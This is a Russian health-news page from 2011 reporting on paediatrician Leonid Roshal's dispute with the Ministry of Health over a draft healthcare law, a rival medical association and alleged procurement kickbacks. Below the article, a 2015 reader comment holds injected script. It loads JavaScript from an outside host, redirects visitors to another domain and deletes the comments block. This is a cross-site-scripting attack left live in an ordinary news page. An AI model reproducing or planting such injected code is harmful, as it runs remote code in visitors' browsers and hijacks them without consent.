Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Нарошатель министерского ...  >>  Нарошатель министерского покоя
 
Обратная связь
 

Нарошатель министерского покоя

Размер шрифта
26 августа 2011 05:01
  • google_analytics: false
  • Нравится

Знаменитый детский врач Леонид Рошаль продолжает борьбу с Минздравсоцразвития. Ведомство наносит ответный удар и создает медицинскую ассоциацию, чтобы найти управу на непокорного доктора.

рошаль

Александр Тушкин / «Здоровье инфо»

В войне Минздравсоцразвития и врачей назревает перелом. Ведомство собирается создать под себя ручную организацию «Российское медицинское общество», сообщил на пресс-конференции в четверг президент Национальной медицинской палаты Леонид Рошаль. Точнее создавать ее не надо, так как ей уже 15 лет, за которые, по словам Рошаля, «она ничего хорошего для российских врачей и пациентов не сделала». В нее нужно только внести новое содержание – сделать послушную Минздравсоцразвития организацию, а потом противопоставить ее Национальной медицинской палате.

– Это маленькая месть. Я очень сожалею, что они уговорили Чазова, уважаемого мною человека, возглавить эту асоциацию. Я лично ему звонил и просил быть президентом нашей палаты. Но он осторожно ведет себя с правительством и отказался, – говорит Леонид Рошаль.

Люди, которые стояли за созданием новой ассоциации также выступают за скорейшее принятие скандального закона об охране здоровья граждан, который и стал камнем преткновения между врачами и министерством. В свое время эти люди помешали раскритиковать закон во время слушаний в Госдуме. Рошаль назвал пару фамилий: руководитель Российского медицинского общества Сергей Багненко, который «смотрит в рот Минздраву», и Олег Янушевич, ректор Московского медико-стоматологического университета.

Так в чем проблема? Рошаль просто призывает сесть за стол переговоров и нормально все обсудить. Национальная медицинская палата была создана самими врачами, то есть «снизу», объединив существующие медицинские палаты. Конкурирующая организация «Российское медицинское общество» будет создана сверху, и тогда в диалоге государство-врачи-пациенты первые два лица сольются воедино. Тогда такие проекты, как закон об охране здоровья граждан, будут проталкиваться в два счета. Однако Голикова не хочет разговаривать с Рошалем и врачами. По словам педиатра, он уже полтора года ждет пятиминутной встречи с ней.

Рошаль идет на фронт

Долгожданной пятиминутки не вышло – в итоге Рошаль и Голикова разговаривали в основном в присутствии премьер-министра России Владимира Путина. Глава ведомства и педиатр так и ни о чем не договорились, зато Рошаль добился главного – принятие закона удалось приостановить. Ради этого Национальная медицинская палата полным составом вступила в свежесозданный «Общероссийский народный фронт» Владимира Путина. Медицина столкнулась с политикой.

За этот шаг оппозиционеры обиделись на Рошаля. Блоги запестрели обидными текстами в адрес врача. Рошаль оправдался тем, что якобы политикой не интересуется, просто «Народный фронт» был единственной политической организацией, которая имела вменяемую программу развития здравоохранения.

Кстати, сам Леонид Михайлович освоил социальные сети недавно. Для распространения информации о скандальном законе Рошаль завел блог в ЖЖ и Твиттере. С помощью Интернета Национальная медицинская палата рассылала врачам предложения внести собственные поправки и комментарии к закону об охране здоровья граждан. Инициатива сработала: на пресс-конференции Рошаль похвастался пухлой папкой из 357 страниц ответов врачей. Они войдут в повестку четырех круглых столов, которые пройдут при содействии «Народного фронта» 31 августа-1 сентября и 8-9 сентября.

Однако участники круглых столов обсудят не поправки, а принципиальные вопросы, на которые еще никто не дал ответа. Что такое платность медицинских услуг или распределение полномочий между регионами и муниципалитетами, о котором говорится в новом законе. На пресс-конференции Рошаль напрямую обратился к журналистам:

– Вы сами понимаете, за что вы должны платить, а за что не должны? Не понимаете. Есть вещи, на которые надо дать ответ, поэтому этот закон сырой.

По мнению Рошаля, Минздравсоцразвития просто вбросил этот документ, а потом заставил врачей и депутатов Госдумы доделывать закон. Сегодня он в таком состоянии, в каком он должен был быть, если бы сегодня Минздрав вносил его в Госдуму.

Томографический распил, медицинский откат

Напомним, что конфликт всемирно известного педиатра и Минздравсоцразвития начался в апреле, когда Рошаль в присутствии премьер-министра России Владимира Путина буквально разгромил ведомство. Выступление Рошаля было настолько мощным, что на запрос «Рошаль» поисковики сразу подбирают материалы на тему «Рошаль выступление». Тогда педиатр заявил, что в «Минздраве нет ни одного нормального, опытного организатора здравоохранения». По его мнению, сотрудники ведомства разбазарили деньги, выделенные на реализацию националього проекта «Здоровье».

В 2011 году на него было выделено 157,2 млрд рублей, но до медиков они не дошли, а осели в карманах чиновников по привычной уже всем российкой схеме: распил и откат. В первом полугодии в одном только Санкт-Петербурге было возбуждено 6 уголовных дел по результатам проверки конкурсных процедур и заключении государственных контрактов: аферисты закупали оборудование по завышенной цене у фирм-однодневок. Разница иной раз достигала 40%! Причем речь шла о высокотехнологичном оборудовании на огромные суммы – так в Самарской области закупили компьютерных томографов на 50 млн рублей, а в Ростовской и Ярославской – на 80 млн рублей. 21 июня президент России Дмитрий Медведев потребовал отчет у Голиковой, намекнув на коррупционную составляющую в закупках. Голикова ответила, мол, программы для томографов столько стоили. «Расширение программной базы может стоить дороже, но не таких же денег», – возмутился тогда президент.

Виновных так и не нашли. Нет, конечно, по стране прокатились «томографические расследования», однако принципиально ситуация не изменилась. Врачи как получали копейки, так и получают. Зато в больницах пылятся никому не нужные компьютерные томографы: закупить-то мы закупили (пусть и с откатами), но работать на них некому. Квалификации не хватает.

– Хороший доктор и в хлеву вылечит, а плохому доктору даже МРТ не поможет, – восклицает Леонид Рошаль. Впрочем, на такую зарплату хорошие доктора не только в хлеву лечат, но еще как-то выживают. По словам Рошаля, в Пскове сотрудники скорой помощи получают 12 тысяч рублей, если работать на две ставки с утра до ночи – то 20 тысяч. Это же какую силу надо иметь, чтобы людям так самоотверженно служить!

Напоследок мы попросили Рошаля дать оценку сегодняшнему состоянию российской медицины. Рошаль ответил, что отечественная система здравоохранения в два раза отстает от западной, например, США и Германии. Поэтому у нас только 30% населения довольны работой врачей.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

24 апреля 2012Мужчины скоро будут жить дольше женщин 01 марта 2012Опубликован перечень редких заболеваний
 
03 октября 2011Россияне чаще всех болеют туберкулезом 29 сентября 2011Новый перечень лекарств зависит от каждого
 
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.